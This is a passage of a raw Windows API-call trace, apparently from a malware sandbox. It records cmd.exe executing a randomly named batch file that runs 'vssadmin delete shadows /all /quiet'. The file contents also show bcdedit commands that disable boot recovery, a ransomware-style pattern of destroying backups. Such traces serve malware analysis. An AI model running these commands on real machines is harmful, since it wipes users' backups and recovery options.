hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f708, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f708*=0x2) returned 1 [0207.894] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0207.894] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0207.894] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0207.894] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0207.894] _wcsicmp (_String1="echo", _String2="COPY") 
returned 2 [0207.894] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0207.894] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0207.895] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0207.895] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0207.895] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0207.895] GetConsoleTitleW (in: lpConsoleTitle=0x28f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.895] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x28f254 | out: _Buffer="CiOHhXJTCFVtKQz1Zuv\r\n") returned 21 [0207.895] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.895] GetFileType (hFile=0x7) returned 0x2 [0207.895] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.895] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f214 | out: lpMode=0x28f214) returned 1 [0207.895] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.895] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x28f240, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f240*=0x15) returned 1 [0207.895] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.895] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0207.896] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.896] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0207.896] _get_osfhandle (_FileHandle=0) returned 0x3 [0207.896] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0207.896] SetConsoleInputExeNameW () returned 0x1 [0207.896] GetConsoleOutputCP () returned 0x1b5 [0207.896] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0207.896] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.896] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" 
(normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0207.896] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0207.896] _get_osfhandle (_FileHandle=3) returned 0x54 [0207.896] SetFilePointer (in: hFile=0x54, lDistanceToMove=503, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1f7 [0207.897] _get_osfhandle (_FileHandle=3) returned 0x54 [0207.897] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1f7 [0207.897] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f6a8*=0x45, lpOverlapped=0x0) returned 1 [0207.897] SetFilePointer (in: hFile=0x54, lDistanceToMove=544, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x220 [0207.897] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=41, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="vssadmin.exe delete shadows /all /quiet\r\nll /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\natuspolicy ignoreallfailures\"\r\n") returned 41 [0207.897] _tell (_FileHandle=3) returned 544 [0207.897] _close (_FileHandle=3) returned 0 [0207.898] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f47c | out: _Buffer="\r\n") returned 2 [0207.898] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.898] GetFileType (hFile=0x7) returned 0x2 [0207.898] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.898] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f43c | out: lpMode=0x28f43c) returned 
1 [0207.898] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.898] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f468*=0x2) returned 1 [0207.898] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.898] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0207.898] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f478 | out: _Buffer=">") returned 1 [0207.898] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.899] GetFileType (hFile=0x7) returned 0x2 [0207.899] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.899] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f440 | out: lpMode=0x28f440) returned 1 [0207.899] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.899] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f46c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x28f46c*=0x19) returned 1 [0207.899] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.899] GetFileType (hFile=0x7) returned 0x2 [0207.899] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.899] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6c4 | out: lpMode=0x28f6c4) returned 1 [0207.899] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.899] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a0d90*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x28f6f0, lpReserved=0x0 | out: lpBuffer=0x4a0d90*, lpNumberOfCharsWritten=0x28f6f0*=0xc) returned 1 [0207.899] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f6fc | out: _Buffer=" delete shadows /all /quiet ") returned 28 [0207.899] _get_osfhandle 
(_FileHandle=1) returned 0x7 [0207.899] GetFileType (hFile=0x7) returned 0x2 [0207.900] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.900] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6bc | out: lpMode=0x28f6bc) returned 1 [0207.900] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.900] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1c, lpNumberOfCharsWritten=0x28f6e8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f6e8*=0x1c) returned 1 [0207.900] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f71c | out: _Buffer="\r\n") returned 2 [0207.900] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.900] GetFileType (hFile=0x7) returned 0x2 [0207.900] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.900] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6dc | out: lpMode=0x28f6dc) returned 1 [0207.900] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.900] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f708, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f708*=0x2) returned 1 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="DIR") returned 18 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="ERASE") returned 17 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="DEL") returned 18 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="TYPE") returned 2 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="COPY") returned 19 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="CD") returned 19 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="CHDIR") returned 19 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="RENAME") returned 4 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="REN") returned 4 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="ECHO") returned 17 [0207.901] _wcsicmp (_String1="vssadmin.exe", 
_String2="SET") returned 3 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="PAUSE") returned 6 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="DATE") returned 18 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="TIME") returned 2 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="PROMPT") returned 6 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="MD") returned 9 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="MKDIR") returned 9 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="RD") returned 4 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="RMDIR") returned 4 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="PATH") returned 6 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="GOTO") returned 15 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="SHIFT") returned 3 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="CLS") returned 19 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="CALL") returned 19 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="VERIFY") returned 14 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="VER") returned 14 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="VOL") returned 4 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="EXIT") returned 17 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="SETLOCAL") returned 3 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="ENDLOCAL") returned 17 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="TITLE") returned 2 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="START") returned 3 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="DPATH") returned 18 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="KEYS") returned 11 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="MOVE") returned 9 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="PUSHD") returned 6 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="POPD") returned 6 [0207.901] _wcsicmp 
(_String1="vssadmin.exe", _String2="ASSOC") returned 21 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="FTYPE") returned 16 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="BREAK") returned 20 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="COLOR") returned 19 [0207.901] _wcsicmp (_String1="vssadmin.exe", _String2="MKLINK") returned 9 [0207.902] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0207.902] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0207.902] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.902] FindClose (in: hFindFile=0x491e00 | out: hFindFile=0x491e00) returned 1 [0207.902] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0207.902] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0207.902] GetConsoleTitleW (in: lpConsoleTitle=0x28f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.902] GetFileAttributesW (lpFileName="vssadmin.exe" (normalized: "c:\\users\\eebsym5\\desktop\\vssadmin.exe")) returned 0xffffffff [0207.902] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0207.902] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0207.902] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0207.902] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0207.902] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0207.902] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0207.902] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0207.902] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0207.902] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0207.903] _wcsicmp 
(_String1="vssadmin", _String2="ECHO") returned 17 [0207.903] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0207.903] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0207.903] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0207.903] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0207.903] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0207.903] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0207.903] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0207.903] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0207.903] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0207.903] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0207.903] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0207.903] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0207.903] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0207.903] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0207.903] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0207.903] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0207.903] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0207.903] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0207.903] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0207.903] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0207.903] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0207.903] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0207.903] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0207.903] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0207.903] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0207.903] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0207.903] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0207.903] _wcsicmp 
(_String1="vssadmin", _String2="ASSOC") returned 21 [0207.903] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0207.903] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0207.903] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0207.903] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0207.903] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0207.903] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0207.903] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0207.903] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0207.903] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0207.903] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0207.903] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0207.903] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0207.903] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0207.903] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0207.903] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0207.903] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0207.903] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0207.903] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0207.903] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0207.904] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0207.904] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0207.904] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0207.904] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0207.904] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0207.904] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0207.904] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0207.904] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0207.904] _wcsicmp 
(_String1="vssadmin", _String2="CALL") returned 19 [0207.904] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0207.904] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0207.904] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0207.904] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0207.904] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0207.904] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0207.904] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0207.904] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0207.904] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0207.904] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0207.904] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0207.904] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0207.904] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0207.904] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0207.904] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0207.904] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0207.904] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0207.904] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0207.904] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0207.904] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0207.904] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0207.904] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0207.904] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0207.904] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.905] FindClose (in: hFindFile=0x492210 | out: hFindFile=0x492210) returned 1 [0207.905] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0207.905] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0207.905] GetConsoleTitleW (in: lpConsoleTitle=0x28f020, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.905] InitializeProcThreadAttributeList (in: lpAttributeList=0x28eea8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28ef70 | out: lpAttributeList=0x28eea8, lpSize=0x28ef70) returned 1 [0207.905] UpdateProcThreadAttribute (in: lpAttributeList=0x28eea8, dwFlags=0x0, Attribute=0x60001, lpValue=0x28ef68, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28eea8, lpPreviousValue=0x0) returned 1 [0207.905] GetStartupInfoW (in: lpStartupInfo=0x28ee64 | out: lpStartupInfo=0x28ee64*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0207.905] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0207.905] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin.exe delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28ef04*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin.exe delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), 
lpProcessInformation=0x28ef50 | out: lpCommandLine="vssadmin.exe delete shadows /all /quiet", lpProcessInformation=0x28ef50*(hProcess=0x58, hThread=0x54, dwProcessId=0xf90, dwThreadId=0x9c4)) returned 1 [0207.906] CloseHandle (hObject=0x54) returned 1 [0207.906] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0207.906] GetEnvironmentStringsW () returned 0x4a0548* [0207.906] FreeEnvironmentStringsW (penv=0x4a0548) returned 1 [0207.907] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0 [0210.605] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0x28ee44 | out: lpExitCode=0x28ee44*=0x2) returned 1 [0210.605] CloseHandle (hObject=0x58) returned 1 [0210.605] _vsnwprintf (in: _Buffer=0x28ef8c, _BufferCount=0x13, _Format="%08X", _ArgList=0x28ee50 | out: _Buffer="00000002") returned 8 [0210.605] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0210.605] GetEnvironmentStringsW () returned 0x4a0548* [0210.605] FreeEnvironmentStringsW (penv=0x4a0548) returned 1 [0210.605] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0210.605] GetEnvironmentStringsW () returned 0x4a0548* [0210.605] FreeEnvironmentStringsW (penv=0x4a0548) returned 1 [0210.605] DeleteProcThreadAttributeList (in: lpAttributeList=0x28eea8 | out: lpAttributeList=0x28eea8) [0210.605] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.605] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0210.605] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.605] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0210.605] _get_osfhandle (_FileHandle=0) returned 0x3 [0210.605] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0210.606] SetConsoleInputExeNameW () returned 0x1 [0210.606] GetConsoleOutputCP () returned 0x1b5 [0210.606] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 
[0210.606] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.606] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0210.606] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0210.606] _get_osfhandle (_FileHandle=3) returned 0x58 [0210.606] SetFilePointer (in: hFile=0x58, lDistanceToMove=544, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x220 [0210.609] _get_osfhandle (_FileHandle=3) returned 0x58 [0210.609] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x220 [0210.609] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f6a8*=0x1c, lpOverlapped=0x0) returned 1 [0210.610] SetFilePointer (in: hFile=0x58, lDistanceToMove=570, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x23a [0210.610] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=26, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="echo CiOHhXJTCFVtKQz1Zuv\r\ns /all /quiet\r\nll /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\natuspolicy ignoreallfailures\"\r\n") returned 26 [0210.611] _tell (_FileHandle=3) returned 570 [0210.611] _close (_FileHandle=3) returned 0 [0210.611] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f47c | out: _Buffer="\r\n") returned 2 [0210.611] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.611] GetFileType (hFile=0x7) returned 
0x2 [0210.611] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0210.611] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f43c | out: lpMode=0x28f43c) returned 1 [0210.611] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.611] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f468*=0x2) returned 1 [0210.612] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0210.612] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0210.612] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0210.612] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f478 | out: _Buffer=">") returned 1 [0210.612] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.612] GetFileType (hFile=0x7) returned 0x2 [0210.612] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0210.612] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f440 | out: lpMode=0x28f440) returned 1 [0210.612] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.612] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f46c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, 